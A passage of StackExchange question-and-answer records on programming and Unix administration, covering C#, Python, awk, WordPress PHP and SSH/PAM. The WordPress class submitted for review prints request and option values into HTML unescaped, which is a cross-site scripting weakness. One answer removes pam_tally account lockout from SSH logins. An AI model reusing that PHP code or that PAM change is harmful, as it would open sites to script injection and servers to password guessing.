arbitrary source (Xml, Db, Form) and save it also to an arbitrary source (Xml, Db, Form), without any avoidable duplicate code. |
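To make the building blocks in the answer above concrete, here is a minimal C# sketch; the DTO's properties, the interface and the XML repository are illustrative only (the real class would carry all ~50 fields):

// Plain DTO: no logic, just the data the form edits.
public class MyConfigData
{
    public string Name { get; set; }
    public int Timeout { get; set; }
    // ... remaining config fields
}

public interface IConfigRepo
{
    MyConfigData Load();
    void Save(MyConfigData config);
}

public class ConfigXmlRepo : IConfigRepo
{
    private readonly string _path;
    public ConfigXmlRepo(string path) { _path = path; }

    public MyConfigData Load()
    {
        var serializer = new System.Xml.Serialization.XmlSerializer(typeof(MyConfigData));
        using (var stream = System.IO.File.OpenRead(_path))
            return (MyConfigData)serializer.Deserialize(stream);
    }

    public void Save(MyConfigData config)
    {
        var serializer = new System.Xml.Serialization.XmlSerializer(typeof(MyConfigData));
        using (var stream = System.IO.File.Create(_path))
            serializer.Serialize(stream, config);
    }
}

A ConfigDbRepo built on the existing Entity Framework code implements the same interface, and the save button then only does Save(GetData()) against whichever repository the form was given.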
_cs.70066 | Does the Ford-Fulkerson/Edmonds-Karp algorithm still work on a network graph where a bidirectional connection exists between two nodes, e.g. $(a,b), (b,a) \in E$? I thought there would be trouble creating the back edges in the residual network when the reverse edge already exists. Or is it equivalent to increase its flow instead? | Bidirectional connection in Ford-Fulkerson's/Edmonds-Karp's algorithm | network flow;ford fulkerson | null |
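Two remarks on the question above (standard max-flow material; the sketch is untested). Most adjacency-list implementations store each directed edge with its own residual capacity and a pointer to its own reverse edge, in which case antiparallel edges need no special handling at all. If an implementation instead keys capacities by the pair (u, v), the usual trick is to reroute one edge of each antiparallel pair through a fresh node:

def remove_antiparallel(capacity):
    # capacity: dict {(u, v): c} with the directed edge capacities.
    # Reroute u->v through a fresh node so no (u, v) slot is shared
    # between an original edge and the residual of its opposite edge.
    result = {}
    handled = set()
    for (u, v), c in capacity.items():
        if (v, u) in capacity and (u, v) not in handled and (v, u) not in handled:
            w = ("split", u, v)          # fresh intermediate node
            result[(u, w)] = c
            result[(w, v)] = c
            handled.add((u, v))
        else:
            result[(u, v)] = c
    return result

The transformed network has the same maximum flow value, so Ford-Fulkerson/Edmonds-Karp run on it unchanged.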
_unix.280469 | How can I give files extended attributes in Mac OS X? Mac OS X doesn't have the 'setattr' command. | How can I give files extended attributes in Mac OS X? | files;osx;xattr | null |
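For what it's worth, macOS ships an xattr command-line tool that covers the usual cases (the attribute name and file below are placeholders):

xattr -w com.example.note "reviewed" report.pdf   # write an attribute
xattr -l report.pdf                               # list attributes and values
xattr -d com.example.note report.pdf              # delete an attribute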
_unix.373834 | https://stackoverflow.com/questions/5105482/compile-main-python-program-using-cython seems to indicate that (just like a C program) you need to jump through hoops to get things running. Being used to simply prepending #!/usr/bin/python, I am wondering if there is a shebang wrapper that does The Right Thing. I am thinking of something like:#!/usr/bin/cythonwrapperprint "Hello world"where cythonwrapper checks if the cached compiled file is newer than the script; if not, it converts the script into C, compiles it, puts the compiled file into a cache, and runs it. | Shebang for cython | python | There is one now. It is called shython: https://gitlab.com/ole.tange/tangetools/tree/master/shython |
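The idea behind such a wrapper is small enough to sketch. The following only illustrates the compile-if-stale-then-run logic (untested; assumes cython, a C compiler, Python >= 3.8 for python3-config --embed, and GNU userland; the path /usr/bin/cythonwrapper is hypothetical):

#!/bin/sh
# Hypothetical /usr/bin/cythonwrapper
script=$1; shift
cache=${XDG_CACHE_HOME:-$HOME/.cache}/cythonwrapper
bin=$cache/$(printf '%s' "$script" | md5sum | cut -d' ' -f1)
mkdir -p "$cache"
if [ ! -x "$bin" ] || [ "$script" -nt "$bin" ]; then
    tail -n +2 "$script" > "$bin.py"     # drop the shebang line
    cython --embed -o "$bin.c" "$bin.py" &&
        cc -O2 -o "$bin" "$bin.c" $(python3-config --cflags --ldflags --embed)
fi
exec "$bin" "$@"

shython (linked in the answer above) packages this kind of logic properly.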
_softwareengineering.348715 | Reading through a scathing article on the downsides of OOP in favour of some other paradigm I've run into an example that I can't find too much fault with. I want to be open to the author's arguments, and although I can theoretically understand their points, one example in particular I'm having a hard time trying to imagine how it would be better implemented in, say, a FP language.From: http://www.smashcompany.com/technology/object-oriented-programming-is-an-expensive-disaster-which-must-end// Consider the case where SimpleProductManager is a child of// ProductManager:public class SimpleProductManager implements ProductManager { private List products; public List getProducts() { return products; } public void increasePrice(int percentage) { if (products != null) { for (Product product : products) { double newPrice = product.getPrice().doubleValue() * (100 + percentage)/100; product.setPrice(newPrice); } } } public void setProducts(List products) { this.products = products; }}// There are 3 behaviors here:getProducts()increasePrice()setProducts()// Is there any rational reason why these 3 behaviors should be linked to// the fact that in my data hierarchy I want SimpleProductManager to be// a child of ProductManager? I can not think of any. I do not want the// behavior of my code linked together with my definition of my data-type// hierarchy, and yet in OOP I have no choice: all methods must go inside// of a class, and the class declaration is also where I declare my// data-type hierarchy:public class SimpleProductManager implements ProductManager// This is a disaster.Note that I am not looking for a rebuttal for or against the writer's arguments for Is there any any rational reason why these 3 behaviours should be linked to the data hierarchy?.What I'm specifically asking is how would this example be modelled/programmed in a FP language (Actual code, not theoretically)? | How would this be programmed in non-OO? | object oriented;functional programming | In FP style, Product would be an immutable class, product.setPrice would not mutate a Product object but return a new object instead, and the increasePrice function would be a standalone function. Using a similar looking syntax like yours (C#/Java like), an equivalent function could look like this: public List increasePrice(List products, int percentage) { if (products != null) { return products.Select(product => { double newPrice = product.getPrice().doubleValue() * (100 + percentage)/100; return product.setPrice(newPrice); }); } else return null;}As you see, the core is not really different here, except the boilerplate code from the contrived OOP example is omitted. However, I don't see this as evidence that OOP leads to bloated code, only as evidence for the fact if one constructs a code example which is sufficiently artificial enough, it is possible to prove anything. |
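To make the "immutable Product" the answer above assumes explicit, here is a small C# sketch; the names and the WithPrice helper are illustrative, not part of the original article:

using System.Collections.Generic;
using System.Linq;

public sealed class Product
{
    public string Name { get; }
    public decimal Price { get; }

    public Product(string name, decimal price) { Name = name; Price = price; }

    // The FP counterpart of setPrice: hand back a new value instead of mutating this one.
    public Product WithPrice(decimal newPrice) => new Product(Name, newPrice);
}

public static class Pricing
{
    public static IEnumerable<Product> IncreasePrice(IEnumerable<Product> products, int percentage) =>
        products?.Select(p => p.WithPrice(p.Price * (100 + percentage) / 100m));
}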
_unix.149100 | How can you hide unwanted apps from the GNOME app menu? I've installed alacarte (Main Menu) and unticked the apps, but they still appear. I've also checked in /usr/share/applications and viewed one of the apps I don't want to appear; its .desktop file says NoDisplay=true, but it still shows. | Remove icons in gnome application menu | gnome3;icons;menu | null |
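A hedged follow-up to the question above: per-user overrides in ~/.local/share/applications take precedence over /usr/share/applications, and the Desktop Entry spec's Hidden=true is treated as "deleted" for that user (foo.desktop is a placeholder name):

cp /usr/share/applications/foo.desktop ~/.local/share/applications/
printf 'Hidden=true\n' >> ~/.local/share/applications/foo.desktop

GNOME Shell may only pick the change up after logging out and back in.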
_codereview.159841 | I'm new to PHP, having coded in Perl and ColdFusion years ago. In the process of trying to familiarize myself with my new job, I have found some code that would neither seem efficient nor logical, although it does execute properly. I would like to get feedback about whether one particular piece of code is poorly done, or whether there is in fact a reason it was done this way that is not apparent to someone new to PHP. The code reads in the contents of a text file, and then sets variables from that file. The input file contains customer records, with fields/columns delineated by commas and rows delineated by line breaks. After the variables are set, they are sliced and diced in various ways, and at the end of each foreach block, a row is appended to another text file. The data in the input text file might look something like this:123456789,MOSName,Bob,Jones,2012 Parakeet Lane999999999,OtherMOSName,Samantha,Smith,1212 Whatever Street236751235,YetAnotherMOSName,Tom,Baker,555 Blahblah Boulevard and so on.The below code only includes what is essential to understand the question.$openit = file('thedirectory/thefilename.txt');foreach($openit as $values) { //acct[0] $acct = explode(',', $values, 2); //mos[1] $mos = explode(',', $values, 3); //f_name[2] $f_name = explode(',', $values, 4); //l_name[3] $l_name = explode(',', $values, 5); //addr[4] $addr = explode(',', $values, 6);...and so on, for 26 variables.My inclination would be to simply explode the string once for each row, and place each value in a variable, like:list($acct, $mos, $f_name, $l_name, $addr) = explode(,, $values);But instead each variable is being set as an array of N items, where N is the limit attribute of explode, and where the final item includes the entire rest of the string. Then the actual piece of data is being referenced in the rest of the file using the element of that array where the relevant info is actually stored. So, acct would be referenced later on in the code as $acct[0], mos would be referenced as $mos[1], etc.Is this as inefficient and illogical as it seems? Or what am I missing here? If it is indeed an odd way of doing things, what would have been the motivation to do it this way? | Setting variables from a text file | php;array | null |
_codereview.2025 | The ConcurrentDictionary<T,V> in .NET 4.0 is thread safe but not all methods are atomic.This points out that:... not all methods are atomic, specifically GetOrAdd and AddOrUpdate. The user delegate that is passed to these methods is invoked outside of the dictionary's internal lock.Example Problem:It is possible for the delegate method to be executed more than once for a given key.public static readonly ConcurrentDictionary<int, string> store = new ConcurrentDictionary<int, string>();[TestMethod]public void UnsafeConcurrentDictionaryTest(){ Thread t1 = new Thread(() => { store.GetOrAdd(0, i => { string msg = Hello from t1; Trace.WriteLine(msg); Thread.SpinWait(10000); return msg; }); }); Thread t2 = new Thread(() => { store.GetOrAdd(0, i => { string msg = Hello from t2; Trace.WriteLine(msg); Thread.SpinWait(10000); return msg; }); }); t1.Start(); t2.Start(); t1.Join(); t2.Join();}The result shown in the Trace window shows Hello from t1 and Hello from t2. This is NOT the desired behavior for most implementations that we are using and confirms the problem noted in the MSDN link above. What we want is for only one of those delegates to be executed.Proposed Solution:I have to use the delegate overloads of these methods which led me to investigate this matter further. I stumbled onto this post which suggests using the Lazy<T> class to ensure the delegate is only invoked once. With that in mind I wrote the following extension methods to mask the adding of a Lazy<T> wrapper to the value.public static V GetOrAdd<T, U, V>(this ConcurrentDictionary<T, U> dictionary, T key, Func<T, V> valueFactory)where U : Lazy<V>{ U lazy = dictionary.GetOrAdd(key, (U)new Lazy<V>(() => valueFactory(key))); return lazy.Value;}public static V AddOrUpdate<T, U, V>(this ConcurrentDictionary<T, U> dictionary, T key, Func<T, V> addValueFactory, Func<T, V, V> updateValueFactory)where U : Lazy<V>{ U lazy = dictionary.AddOrUpdate(key, (U)new Lazy<V>(() => addValueFactory(key)), (k, oldValue) => (U)new Lazy<V>(() => updateValueFactory(k, oldValue.Value))); return lazy.Value;}Testing Solution:Executing the same test above using a ConcurrentDictionary that has a Lazy value results in the value delegate ONLY being executed once (you either see Hello from t1 or Hello from t2)! public static readonly ConcurrentDictionary<int, Lazy<string>> safeStore = new ConcurrentDictionary<int, Lazy<string>>();So it seems that this approach accomplished the goal.What do you think of this approach? | Extension methods to make ConcurrentDictionary GetOrAdd and AddOrUpdate thread safe when using valueFactory delegates | c#;thread safety | Allowing the caller to provide the type argument U implies that they are allowed to use a subclass of Lazy<V>, but this will not work as your implementations always creates a new List<V> and cast it to U. Since this means U must always be a Lazy<V> then why not do away with the extra type argument.public static V GetOrAdd<T, V>(this ConcurrentDictionary<T, Lazy<V>> dictionary, T key, Func<T, V> valueFactory)The name of the new extension methods conflict with the names of the existing methods. For the consumer to use yours instead of the existing methods, they would need to either access via your static class or use explicit type arguments. 
This could lead to subtle bugs when consumers try to use it as a extension method with type inference.ExtensionHost.GetOrAdd(safeStore, 7, (i) => i.ToString()); // uses yourssafeStore.GetOrAdd<int, Lazy<string>, string>(6, (i) => i.ToString()); // uses yourssafeStore.GetOrAdd(5, (i) => i.ToString()); // uses existing |
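For readers landing on the question above: the Lazy pattern it builds on can also be used directly, without the extension methods, which sidesteps the name-collision problem entirely (using System and System.Collections.Concurrent; ExpensiveLoad is a placeholder):

var store = new ConcurrentDictionary<int, Lazy<string>>();

string value = store.GetOrAdd(
        42,
        key => new Lazy<string>(() => ExpensiveLoad(key)))
    .Value;

Under a race two Lazy wrappers may still be constructed, but only the one that wins the GetOrAdd is ever published, and with the default LazyThreadSafetyMode.ExecutionAndPublication its factory runs at most once.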
_codereview.54093 | I am implementing a Point in polygon algorithm.Inputs:M, N: size of the matrixpoly: a list of tuples that represent the points of polygon. Output:A mask matrix which is ones everywhere, except the point in the polygon should be 0.import numpy as npimport cv2def getABC(x1, y1, x2, y2): A = y2 - y1 B = x1 - x2 C = A*x1 + B*y1 return (A, B, C)def polygon(M, N, poly): out = np.ones((M, N))*255 n = len(poly) for i in range(M): intersection_x = i intersection_y = [] # check through all edges for edge in range(n + 1): v1_x, v1_y = poly[edge % n] v2_x, v2_y = poly[(edge + 1) % n] A1, B1, C1 = getABC(v1_x, v1_y, v2_x, v2_y) A2 = 1 B2 = 0 C2 = i # find intersection det = A1*B2 - A2*B1 if (det != 0): tmp = (A1 * C2 - A2 * C1)/det if tmp >= min(v1_y, v2_y) and tmp <= max(v1_y, v2_y): intersection_y.append(tmp) intersection_y = list(set(intersection_y)) print intersection_y if len(intersection_y) == 1: intersection_y.append(intersection_y[0]) for k in range(1, len(intersection_y), 2): out[intersection_x, intersection_y[k - 1]:intersection_y[k]] = 0 return outpoly = [(10,20), (10,40), (30,20), (30,40)]out = polygon(100,100, poly)cv2.imwrite(out.png, out)Is this the optimal algorithm? I use a scanning line, find the intersection with edges and make all the point between the intersections to be zero. | Point in a polygon algorithm | python;algorithm;matrix;numpy;computational geometry | null |
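On the "is this optimal" part of the question above: since OpenCV is already imported there, rasterising the polygon with cv2.fillPoly is usually far faster than a hand-rolled scanline and avoids the intersection bookkeeping. A sketch matching the question's (row, col) convention and 255/0 mask values; note that fillPoly expects the vertices in boundary order:

import numpy as np
import cv2

def polygon_mask(M, N, poly):
    mask = np.full((M, N), 255, dtype=np.uint8)
    # cv2 expects points as (x, y) = (col, row), so swap the tuple order.
    pts = np.array([(y, x) for (x, y) in poly], dtype=np.int32)
    cv2.fillPoly(mask, [pts], 0)
    return mask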
_unix.387880 | On my ssh server, I'm trying to hide the existence of all the users except for one. For any user besides that one user, I will get a Password: prompt which will never allow the user to enter. That's good. But for real users, after a certain number of attempts it will start printing Account locked due to XX failed logins. It will not do this for the non-existant users. How can I disable this message? | SSH account locking reveals real users | ssh;pam;access control | The message Account locked due to XX failed logins is the result of your using pam_tally (most probably pam_tally2). Just comment the corresponding lines in your PAM configuration files. |
_unix.277545 | I want to search each record (records are defined by blank lines) in a file for the pattern NAME#AAAA. If it matches, then insert an # in front of the record's age and insert a line age NIL at the end of the record. INPUT FILE:NAME#AAAASTD 1SEC AAGE 5NAME#BBBBSTD 2SEC BAGE 6NAME#CCCCSTD 3SEC CAGE 7NAME#AAAASTD 4AGE 9NAME#AAAASTD 7SEC AAGE 12EXPECTED OUTPUTNAME#AAAASTD 1SEC A#AGE 5AGE NILNAME#BBBBSTD 2SEC BAGE 6NAME#CCCCSTD 3SEC CAGE 7NAME#AAAASTD 4#AGE 9AGE NILNAME#AAAASTD 7SEC A#AGE 12AGE NIL | I want to search and replace a pattern | text processing;awk;sed | Whenever you see records separated by blank lines (paragraphs, if you like), Perl's paragraph mode is often a good solution:$ perl -00lpe 'if(/NAME#AAAA/){s/\bAGE\s/#$&/; s/$/\nAGE NIL/;}' fileNAME#AAAASTD 1SEC A#AGE 5AGE NILNAME#BBBBSTD 2SEC BAGE 6NAME#CCCCSTD 3SEC CAGE 7NAME#AAAASTD 4#AGE 9AGE NILNAME#AAAASTD 7SEC A#AGE 12AGE NILExplanation-00 : this activates perl's paragraph mode, where each paragraph (group of non-blank lines until a blank one) is treated as a line.-l : removes trailing newlines from each input record (each paragraph) and adds a newline to each print call.-pe : print each input record aftrer applying the script given by -e to it. So, those flags make perl read over the input file, applying the script to each record, and then printing the result. The script itself does:if(/NAME#AAAA/) : if this record matches NAME#AAAA.s/\bAGE\s/#$&/ : The s/foo/bar/ is the substitution operator. It will replace foo with bar. Here, I am replacing AGE with itself preceded by a #. The \b matches word boundaries, and will exclude things like ADAGE from the match. The $& is a special variable and means whatever was matched. So, s/\bAGE\s/#$&/ will replace AGE with #AGE. s/$/\nAGE NIL/ : The $ matches the end of the record. So replacing it with something else will append to the end of the record. This command appends AGE NIL to the end of the matched record. Note that all operations here are case sensitive. If you need case insensitive matching use this instead:perl -00lpe 'if(/NAME#AAAA/i){s/\bAGE\s/#$&/i; s/$/\nAGE NIL/i;}' file |
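The same record-at-a-time idea works in awk, whose "paragraph mode" is RS=""; a sketch equivalent to the Perl answer above (modulo trailing blank-line details):

awk 'BEGIN{RS=""; ORS="\n\n"} /NAME#AAAA/{sub(/\nAGE /, "\n#AGE "); $0 = $0 "\nAGE NIL"} {print}' file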
_hardwarecs.2702 | Looking at recommendations for a graphics card that fulfills the following spec in order of importance:Dual 4K (60hz) capablePassive cooledCheap (only business graphics required)Two displayport/ mini display port connectorsAMD chipset | Passive cooled graphics card for dual 4K screens | graphics cards;pc;cooling | null |
_codereview.154525 | I have recently delved into the world of OOP programming with PHP. I wanted to add my own custom menu to the Wordpress Admin area, and came across a tutorial, which I have followed, and the code is currently working.What I would like to know, is whether this is the correct way to go about it, is it secure (since it deals with storing stuff in the Database) and can it be improved upon.class AddMenu extends TheGlobalSettings {public $default = array( 'slug' => '', 'title' => '', 'page_title' => '', 'parent' => null, 'id' => '', 'capability' => 'manage_options', 'icon' => 'dashicons-hammer', 'position' => null, 'desc' => '', 'function' => '' );public $parentID = null;public $menu_options = array();function __construct( $options ) { $this->menu_options = array_merge( $this->default, $options ); if( $this->menu_options['slug'] == '' ) : return; endif; $this->settings_id = $this->menu_options['slug']; $this->prepopulate(); add_action( 'admin_menu', array( $this, 'add_page' ) ); add_action( 'wordpressmenu_page_save_' . $this->settings_id, array( $this, 'save_settings' ) );}public function prepopulate() { if( $this->menu_options['title'] == '') : $this->menu_options['title'] = ucfirst( $this->menu_options['slug'] ); endif; if( $this->menu_options['page_title'] = '' ) : $this->menu_options['page_title'] = $this->menu_options['title']; endif;}public function add_page() { $functionToUse = $this->menu_options['function']; if( $functionToUse == '' ) : $functionToUse = array( $this, 'create_menu_page' ); endif; if( $this->parent_id != null ) : add_submenu_page( $this->parent_id, $this->menu_options['page_title'], $this->menu_options['title'], $this->menu_options['capability'], $this->menu_options['slug'], $functionToUse ); else : add_menu_page( $this->menu_options['page_title'], $this->menu_options['title'], $this->menu_options['capability'], $this->menu_options['slug'], $functionToUse, $this->menu_options['icon'], $this->menu_options['position'] ); endif;}public function create_menu_page() { $this->save_if_submit(); $tab = 'general'; if( isset( $_GET['tab'] ) ) : $tab = $_GET['tab']; endif; $this->init_settings(); ?> <div class=wrap> <h2><?php echo $this->menu_options['page_title']; ?></h2> <?php if( !empty( $this->menu_options['desc'] ) ) : ?> <p class=description><?php echo $this->menu_options['desc']; ?></p> <?php endif;?> <?php $this->render_tabs(); ?> <form method=POST action=> <div class=postbox> <div class=inside> <table class=form-table> <?php $this->render_fields( $tab ); ?> </table> <?php $this->save_button(); ?> </div> </div> </form> </div><?php}public function render_tabs( $active_tab = 'general' ) { if( count( $this->tabs ) > 1 ) { echo '<h2 class=nav-tab-wrapper woo-nav-tab-wrapper>'; foreach ($this->tabs as $key => $value) : echo '<a href=' . admin_url('admin.php?page=' . $this->menu_options['slug'] . '&tab=' . $key ) . ' class=nav-tab ' . ( ( $key == $active_tab ) ? 'nav-tab-active' : '' ) . ' >' . $value . '</a>'; endforeach; echo '</h2>'; echo '<br/>'; }}/** * Render the save button * @return void */protected function save_button() { ?> <button type=submit name=<?php echo $this->settings_id; ?>_save class=button button-primary> <?php _e( 'Save', 'textdomain' ); ?> </button> <?php}/** * Save if the button for this menu is submitted * @return void */protected function save_if_submit() { if( isset( $_POST[ $this->settings_id . '_save' ] ) ) { do_action( 'wordpressmenu_page_save_' . 
$this->settings_id ); }}}class AddSubPage extends AddMenu {function __construct( $options, AddMenu $parent ) { parent::__construct( $options ); $this->parent_id = $parent->settings_id;}}class WordPressMenuTab {public $slug;public $title;public $menu;function __construct( $options, AddMenu $menu ) { $this->slug = $options['slug']; $this->title = $options['title']; $this->menu = $menu; $this->menu->add_tab( $options );}/** * Add field to this tab * @param [type] $array [description] */public function add_field( $array ){ $this->menu->add_field( $array, $this->slug );}}abstract class TheGlobalSettings {/** * ID of the settings * @var string */public $settings_id = '';/** * Tabs for the settings page * @var array */public $tabs = array( 'general' => 'General' );/** * Settings from database * @var array */protected $settings = array();/** * Array of fields for the general tab * array( * 'tab_slug' => array( * 'field_name' => array(), * ), * ) * @var array */protected $fields = array();/** * Data gotten from POST * @var array */protected $posted_data = array();public function init_settings() { $this->settings = (array) get_option( $this->settings_id ); foreach ( $this->fields as $tab_key => $tab ) { foreach ( $tab as $name => $field ) { if( isset( $this->settings[ $name ] ) ) { $this->fields[ $tab_key ][ $name ]['default'] = $this->settings[ $name ]; } } }}/** * Save settings from POST * @return [type] [description] */public function save_settings(){ $this->posted_data = $_POST; if( empty( $this->settings ) ) { $this->init_settings(); } foreach ($this->fields as $tab => $tab_data ) { foreach ($tab_data as $name => $field) { $this->settings[ $name ] = $this->{ 'validate_' . $field['type'] }( $name ); } } update_option( $this->settings_id, $this->settings ); }/** * Gets and option from the settings API, using defaults if necessary to prevent undefined notices. * * @param string $key * @param mixed $empty_value * @return mixed The value specified for the option or a default value for the option. */public function get_option( $key, $empty_value = null ) { if ( empty( $this->settings ) ) { $this->init_settings(); } // Get option default if unset. if ( ! isset( $this->settings[ $key ] ) ) { $form_fields = $this->fields; foreach ( $this->tabs as $tab_key => $tab_title ) { if( isset( $form_fields[ $tab_key ][ $key ] ) ) { $this->settings[ $key ] = isset( $form_fields[ $tab_key ][ $key ]['default'] ) ? $form_fields[ $tab_key ][ $key ]['default'] : ''; } } } if ( ! 
is_null( $empty_value ) && empty( $this->settings[ $key ] ) && '' === $this->settings[ $key ] ) { $this->settings[ $key ] = $empty_value; } return $this->settings[ $key ];}public function validate_text( $key ){ $text = $this->get_option( $key ); if ( isset( $this->posted_data[ $key ] ) ) { $text = wp_kses_post( trim( stripslashes( $this->posted_data[ $key ] ) ) ); } return $text; } /** * Validate textarea field * @param string $key name of the field * @return string */ public function validate_textarea( $key ){ $text = $this->get_option( $key ); if ( isset( $this->posted_data[ $key ] ) ) { $text = wp_kses( trim( stripslashes( $this->posted_data[ $key ] ) ), array_merge( array( 'iframe' => array( 'src' => true, 'style' => true, 'id' => true, 'class' => true ) ), wp_kses_allowed_html( 'post' ) ) ); } return $text; } /** * Validate WPEditor field * @param string $key name of the field * @return string */ public function validate_wpeditor( $key ){ $text = $this->get_option( $key ); if ( isset( $this->posted_data[ $key ] ) ) { $text = wp_kses( trim( stripslashes( $this->posted_data[ $key ] ) ), array_merge( array( 'iframe' => array( 'src' => true, 'style' => true, 'id' => true, 'class' => true ) ), wp_kses_allowed_html( 'post' ) ) ); } return $text; } /** * Validate select field * @param string $key name of the field * @return string */ public function validate_select( $key ) { $value = $this->get_option( $key ); if ( isset( $this->posted_data[ $key ] ) ) { $value = stripslashes( $this->posted_data[ $key ] ); } return $value; } /** * Validate radio * @param string $key name of the field * @return string */ public function validate_radio( $key ) { $value = $this->get_option( $key ); if ( isset( $this->posted_data[ $key ] ) ) { $value = stripslashes( $this->posted_data[ $key ] ); } return $value; } /** * Validate checkbox field * @param string $key name of the field * @return string */ public function validate_checkbox( $key ) { $status = ''; if ( isset( $this->posted_data[ $key ] ) && ( 1 == $this->posted_data[ $key ] ) ) { $status = '1'; } return $status; } public function add_field( $array, $tab = 'general' ) { $allowed_field_types = array( 'text', 'textarea', 'wpeditor', 'select', 'radio', 'checkbox' ); // If a type is set that is now allowed, don't add the field if( isset( $array['type'] ) &&$array['type'] != '' && ! in_array( $array['type'], $allowed_field_types ) ){ return; } $defaults = array( 'name' => '', 'title' => '', 'default' => '', 'placeholder' => '', 'type' => 'text', 'options' => array(), 'default' => '', 'desc' => '', ); $array = array_merge( $defaults, $array ); if( $array['name'] == '' ) { return; } foreach ( $this->fields as $tabs ) { if( isset( $tabs[ $array['name'] ] ) ) { trigger_error( 'There is alreay a field with name ' . $array['name'] ); return; } } // If there are options set, then use the first option as a default value if( ! empty( $array['options'] ) && $array['default'] == '' ) { $array_keys = array_keys( $array['options'] ); $array['default'] = $array_keys[0]; } if( ! isset( $this->fields[ $tab ] ) ) { $this->fields[ $tab ] = array(); } $this->fields[ $tab ][ $array['name'] ] = $array; } /** * Adding tab * @param array $array options */ public function add_tab( $array ) { $defaults = array( 'slug' => '', 'title' => '' ); $array = array_merge( $defaults, $array ); if( $array['slug'] == '' || $array['title'] == '' ){ return; } $this->tabs[ $array['slug'] ] = $array['title']; } public function render_fields( $tab ) { if( ! 
isset( $this->fields[ $tab ] ) ) : echo '<p>' . __( 'There are no settings on these page.', 'textdomain' ) . '</p>'; return; endif; foreach ( $this->fields[ $tab ] as $name => $field ) : $this->{ 'render_' . $field['type'] }( $field ); endforeach; } public function render_text( $field ){ extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <input type=<?php echo $type; ?> name=<?php echo $name; ?> id=<?php echo $name; ?> value=<?php echo $default; ?> placeholder=<?php echo $placeholder; ?> /> <?php if( $desc != '' ) { echo '<p class=description>' . $desc . '</p>'; }?> </td> </tr> <?php } /** * Render textarea field * @param string $field options * @return void */ public function render_textarea( $field ){ extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <textarea name=<?php echo $name; ?> id=<?php echo $name; ?> placeholder=<?php echo $placeholder; ?> ><?php echo $default; ?></textarea> <?php if( $desc != '' ) { echo '<p class=description>' . $desc . '</p>'; }?> </td> </tr> <?php } /** * Render WPEditor field * @param string $field options * @return void */ public function render_wpeditor( $field ){ extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <?php wp_editor( $default, $name, array('wpautop' => false) ); ?> <?php if( $desc != '' ) { echo '<p class=description>' . $desc . '</p>'; }?> </td> </tr> <?php } /** * Render select field * @param string $field options * @return void */ public function render_select( $field ) { extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <select name=<?php echo $name; ?> id=<?php echo $name; ?> > <?php foreach ($options as $value => $text) { echo '<option ' . selected( $default, $value, false ) . ' value=' . $value . '>' . $text . '</option>'; } ?> </select> <?php if( $desc != '' ) { echo '<p class=description>' . $desc . '</p>'; }?> </td> </tr> <?php } /** * Render radio * @param string $field options * @return void */ public function render_radio( $field ) { extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <?php foreach ($options as $value => $text) { echo '<input name=' . $name . ' id=' . $name . ' type='. $type . ' ' . checked( $default, $value, false ) . ' value=' . $value . '>' . $text . '</option><br/>'; } ?> <?php if( $desc != '' ) { echo '<p class=description>' . $desc . '</p>'; }?> </td> </tr> <?php } /** * Render checkbox field * @param string $field options * @return void */ public function render_checkbox( $field ) { extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <input <?php checked( $default, '1', true ); ?> type=<?php echo $type; ?> name=<?php echo $name; ?> id=<?php echo $name; ?> value=1 placeholder=<?php echo $placeholder; ?> /> <?php echo $desc; ?> </td> </tr> <?php }}$newMenu = new AddMenu( array( 'slug' => 'sitesettings','title' => 'Site Settings','desc' => '','icon' => '','position' => 5));$newMenu->add_field(array('name' => 'text','title' => 'Text Input','desc' => '' ));$customTab = new WordPressMenuTab( array( 'slug' => 'example_tab', 'title' => 'Example Tab' ), $newMenu ); | Custom WordPress Menu | php;security;wordpress | null |
_unix.163439 | There is an input file that has TAB-delimited columns. We need to remove the lines which have NA in both the fourth AND the eleventh column. Question: how can we do this in awk? | How to exclude lines that have NA in given columns? | text processing;awk | awk -F'\t' '$4 != "NA" || $11 != "NA"' filenameNote, awk does not edit the file in-place. If you want to save the changes back to the file, then:tmp=$(mktemp)awk -F'\t' '...' filename > "$tmp" && mv "$tmp" filename |
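Since the requirement above is phrased as "NA in the fourth AND the eleventh column", the same filter can also be written in that shape directly, which is easier to match against the spec:

awk -F'\t' '!($4 == "NA" && $11 == "NA")' filename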
_unix.228532 | I have a file that looks like:1 rs6687776 1020428 T C T C T C C C T C C C T CThe 4th and 5th column are the two different possible alleles at that site. I need to change column 6 onwards so as to show 0 if there is a T allele and 1 if there is a C allele. My file is 20805 x 459. So should look like:1 rs6687776 1020428 T C 0 1 0 1 1 1 0 1 1 1 0 1I've tried:cat file | while read linedo if [ [,6-] = [,4] ]then echo 0 echo 1fidoneBut I just end up with a file of alternating 0's and 1's that is 41610 rows long. Maybe AWK is more useful? | Convert genotypes to 0/1 | text processing;awk;replace | Here's another awk approach:$ awk '{a[$4]=0;a[$5]=1; for(i=6;i<=NF;i++){$i=a[$i]}}1;' file1 rs6687776 1020428 T C 0 1 0 1 1 1 0 1 1 1 0 1Explanationa[$4]=0;a[$5]=1; : creates the array a with two keys, $4 and $5. The value for $4 is set to 0 and that of $5 to 1. for(i=6;i<=NF;i++){$i=a[$i]} : for each field number from 6 to the last one, set that field to whatever is stored in the array for the nucleotide found. 1; : awk shorthand for print this line.You could also do it with Perl:$ perl -lane 's/$F[3]/0/ for @F[5..$#F]; s/$F[4]/1/ for @F[5..$#F]; print @F' file1 rs6687776 1020428 T C 0 1 0 1 1 1 0 1 1 1 0 1This is the same idea. The -a makes perl act like awk, splitting each line on whitespace into the array @F. We then substitute all cases of the nucleotide found in the 4th field ($F[3], arrays start at 0) with 0 and all cases of the 5th ($F[4]) with 1. The for @F[5..$#F] means that the substitution is only applied for fields 6 to last. Finally, the modified array is printed. |
